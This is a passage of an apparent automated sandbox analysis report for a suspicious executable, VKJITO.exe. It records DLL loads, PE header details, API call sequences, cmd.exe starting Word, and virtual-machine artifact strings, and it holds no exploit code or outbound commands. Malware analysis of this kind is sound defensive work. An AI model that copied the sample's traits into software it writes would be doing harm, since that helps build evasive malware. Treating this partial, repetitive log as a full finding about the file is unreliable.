        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: ???????.LNK.7.drLNK file: ..\..\..\..\..\Desktop\.docx
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
        Source: VKJITO.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CBCB0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,ReleaseMutex,0_2_00007FF73A5CBCB0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00000266E7A40128 push eax; ret 0_2_00000266E7A40364
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00000266E7A402FA push eax; ret 0_2_00000266E7A40364
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A1880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF73A5A1880
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
        Source: Amcache.hve.12.drBinary or memory string: VMware
        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7A95000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2082182507.00000266E7AD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWiz
        Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.12.drBinary or memory string: vmci.sys
        Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.12.drBinary or memory string: VMware20,1
        Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
